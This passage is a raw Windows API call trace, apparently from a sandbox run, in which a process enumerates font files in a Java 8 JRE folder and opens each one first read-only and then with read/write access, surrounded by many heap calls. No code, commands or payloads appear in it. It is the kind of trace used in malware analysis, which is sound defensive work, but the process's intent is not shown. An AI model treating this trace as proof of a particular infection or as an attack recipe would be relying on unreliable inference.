ftLastWriteTime.dwLowDateTime=0xa8c0476d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x12588)) returned 1 [0096.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8abb8 | out: hHeap=0x20000) returned 1 [0096.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0096.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0096.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0096.866] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.866] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.866] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c0476d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x12574, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="LucidaBrightDemiItalic.ttf", cAlternateFileName="LUCIDA~2.TTF")) returned 1 [0096.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0096.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68e50 [0096.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0096.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0096.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0096.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0096.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0096.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0096.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68e50 | out: hHeap=0x20000) returned 1 [0096.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0096.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0096.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0096.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0096.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0096.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0096.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0096.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0096.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0096.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0096.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0096.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0096.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ace8 [0096.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0096.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0096.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b078 [0096.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0096.866] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.866] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.866] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.866] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0096.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0096.866] AreFileApisANSI () returned 1 [0096.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiItalic.ttf", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiItalic.ttf", lpUsedDefaultChar=0x0) returned 72 [0096.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d370 [0096.867] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.867] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0096.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0096.867] AreFileApisANSI () returned 1 [0096.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0096.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a790 [0096.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x8a790, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiItalic.ttf") returned 72 [0096.867] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiItalic.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidabrightdemiitalic.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0096.867] GetFileType (hFile=0x360) returned 0x1 [0096.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0096.867] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0096.868] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0096.868] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0096.868] CloseHandle (hObject=0x360) returned 1 [0096.868] AreFileApisANSI () returned 1 [0096.868] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0096.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a368 [0096.868] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiItalic.ttf") returned 72 [0096.868] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiItalic.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidabrightdemiitalic.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0096.868] GetFileType (hFile=0x360) returned 0x1 [0096.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0096.868] CloseHandle (hObject=0x360) returned 1 [0096.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0096.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0096.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0096.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0096.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0096.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0096.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0096.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0096.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0096.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0096.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0096.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0096.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0096.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0096.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0096.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0096.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0096.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0096.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0096.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0096.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0096.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0096.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0096.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0096.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0096.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0096.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0096.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0096.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0096.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0096.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0096.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0096.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0096.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0096.869] AreFileApisANSI () returned 1 [0096.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0096.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b078 [0096.870] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x8b078, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiItalic.ttf") returned 72 [0096.870] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiItalic.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidabrightdemiitalic.ttf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c0476d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x12574)) returned 1 [0096.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0096.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0096.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0096.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d370 | out: hHeap=0x20000) returned 1 [0096.870] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.870] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.870] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c2a9b3, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x13bd8, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="LucidaBrightItalic.ttf", cAlternateFileName="LUCIDA~3.TTF")) returned 1 [0096.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0096.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0096.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0096.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0096.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0096.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0096.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0096.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0096.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0096.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0096.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0096.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0096.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0096.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0096.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0096.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0096.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0096.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0096.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0096.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0096.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0096.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ac50 [0096.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0096.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0096.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a5c8 [0096.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ac50 | out: hHeap=0x20000) returned 1 [0096.871] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.871] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.871] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.871] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0096.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0096.871] AreFileApisANSI () returned 1 [0096.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightItalic.ttf", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightItalic.ttf", lpUsedDefaultChar=0x0) returned 68 [0096.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0096.871] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.871] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0096.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0096.871] AreFileApisANSI () returned 1 [0096.871] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0096.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x820e8 [0096.871] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x820e8, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightItalic.ttf") returned 68 [0096.871] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightItalic.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidabrightitalic.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0096.871] GetFileType (hFile=0x360) returned 0x1 [0096.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x820e8 | out: hHeap=0x20000) returned 1 [0096.872] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0096.872] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0096.872] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0096.872] CloseHandle (hObject=0x360) returned 1 [0096.872] AreFileApisANSI () returned 1 [0096.872] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0096.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82dd8 [0096.872] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x82dd8, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightItalic.ttf") returned 68 [0096.872] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightItalic.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidabrightitalic.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0096.872] GetFileType (hFile=0x360) returned 0x1 [0096.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82dd8 | out: hHeap=0x20000) returned 1 [0096.873] CloseHandle (hObject=0x360) returned 1 [0096.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0096.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0096.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0096.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0096.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0096.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0096.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0096.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0096.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0096.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0096.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0096.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0096.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0096.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0096.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0096.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0096.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0096.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0096.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0096.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0096.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0096.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0096.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0096.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0096.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0096.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0096.874] 